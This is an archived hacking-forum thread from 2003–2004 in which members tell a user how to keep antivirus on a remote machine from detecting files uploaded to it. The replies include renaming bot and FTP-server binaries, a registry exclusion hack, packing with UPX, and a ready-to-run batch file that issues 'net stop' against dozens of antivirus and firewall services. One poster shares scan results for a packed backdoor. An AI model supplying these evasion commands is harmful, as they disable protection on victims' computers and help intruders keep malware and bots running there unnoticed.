hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
Yosam
Sep 16 2003, 04:17 PM
Hi, i remember GSecur posted once how to disable or bypassing an anti-virus
on a remote machine, i tried to search for it but no luck..

anyone knows how can i make the the anti-virus won't alert
about the files i upload in the remote machine?


thanks in advanced.
Certox
Sep 17 2003, 03:35 AM
I just rename the ext. I am guessing ur trying to put up a ftp and iroffer. And lots of anti-virus will delete it, so just name it iroffer.ex and servu.ex the modify ur bat to read them, if you can get ur ftp up reg just do that, and if you are haveing problems getting ur bat to start the bot just do : site exec iroffer.ex -b xdcc.config
It will start right up smile.gif
Of course I dont mean for you to do anything illegal, so when trying to bypass your own anit-virus on your own computer, do that tongue.gif
Jeeve5
Sep 17 2003, 11:06 AM
Hi

The way I usually do it is:
1. stop the AV service
2. upload a registry hack that tells the AV to exclude all files in the dir you up your kit to
3. regedit /s patch.reg
4. restart the AV service

Usually works. Only excpetion I found is OfficeScan NT. Thing to do there is modify the exclude filenames to you yourprog1.exe and yourprog2.exe

Hope that helped,
Jeeve5
Imps2
Sep 17 2003, 12:34 PM
Use a packer and rename u'r file or kill the AV wink.gif

net stop Mcshield
net stop "Norton Antivirus Service"
net stop "Panda Antivirus"
net stop "ZoneAlarm"
net stop "Detector de OfficeScanNT"
net stop "McAfee Framework Service"


Greetz Imps2
Yosam
Sep 17 2003, 12:38 PM
What is a packer exactly?
what what file are you talking about?

can i just put this "code" that u gave me into a bat file
and run it on the machine?
Jeeve5
Sep 17 2003, 12:47 PM
The most common packer is UPX.

The 'code' he just gave you is to stop the AV services. Problem is that Norton usually recognizes packed files and therefore it is useless.
Yosam
Sep 17 2003, 12:49 PM
ok but i didn't understand your method.

what is a registry hack?
where can i find it?
Imps2
Sep 17 2003, 12:50 PM
A packer changes the size of u'r proggie and renames it so it's harder to detect by AV software.

You should be able to run the commands from a bat file

Greetz Imps2
miezmiez
Jan 31 2004, 03:31 PM
link to test your files online:

http://www.kaspersky.com/de/remoteviruschk.html

and the results are horrible:

Zu überprüfende Datei: server_.exe

server_.exe Komprimiert: ASPack
server_.exe Komprimiert: ASPack
server_.exe Komprimiert: Morphine
server_.exe Komprimiert: UPX
server_.exe Infiziert: Backdoor.Winshell.50

kaspersky know all known exe packers and has the depacker i think ...

does anybody has an unknown packer ???

Reaper527
Jan 31 2004, 06:48 PM
put the following code into av.bat

CODE

@echo off
net stop AVP32
net stop LOCKDOWN2000
net stop AVP.EXE
net stop CFINET32
net stop CFINET
net stop ICMON
net stop SAFEWEB
net stop WEBSCANX
net stop ANTIVIR
net stop MCAFEE
net stop NORTON
net stop NVC95
net stop FP-WIN
net stop IOMON98
net stop PCCWIN98
net stop F-PROT95
net stop F-STOPW
net stop PVIEW95
net stop NAVWNT
net stop NAVRUNR
net stop NAVLU32
net stop NAVAPSVC
net stop NISUM
net stop SYMPROXYSVC
net stop RESCUE32
net stop NISSERV
net stop ATRACK
net stop IAMAPP
net stop LUCOMSERVER
net stop LUALL
net stop NMAIN
net stop NAVW32
net stop NAVAPW32
net stop VSSTAT
net stop VSHWIN32
net stop AVSYNMGR
net stop AVCONSOL
net stop WEBTRAP
net stop POP3TRAP
net stop PCCMAIN
net stop PCCIOMON


its a list i got from a friend, basically just put that bat file on their comp and run it and it will attempt to stop a whole bunch of differant av's, odds are whatever they use is on that list somewhere.
LittleHacker
Feb 1 2004, 01:01 AM
Usefull list.
I add AVG Antivirus by Grisoft. Services are
QUOTE

avgamsrv.exe  :    AVG Alert Manager
avgcc.exe        :    AVG Control Center
avgemc.exe    :    AVG E-mail Scanner

and warn you about a VxD it uses. It will work even you kill all these Process! sad.gif
Trojan^kid
Feb 1 2004, 01:18 PM
packers is agood choise to by pass norton and other antivirus
McAfee and ksv ithink hex edite is the only one smile.gif
cheers
--Elite--
Feb 2 2004, 07:16 PM
Your complete answer.

Seems the members completed my post enough , to help ... smile.gif
globe7
Feb 2 2004, 11:51 PM
i love the esy way:
look at the service list
and stop the anti virus (:
bjoernfun
Feb 3 2004, 07:50 AM
Heya,

@Jeeve5 can you post the registry hack, so the AV will exclude the directory!


thanks

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.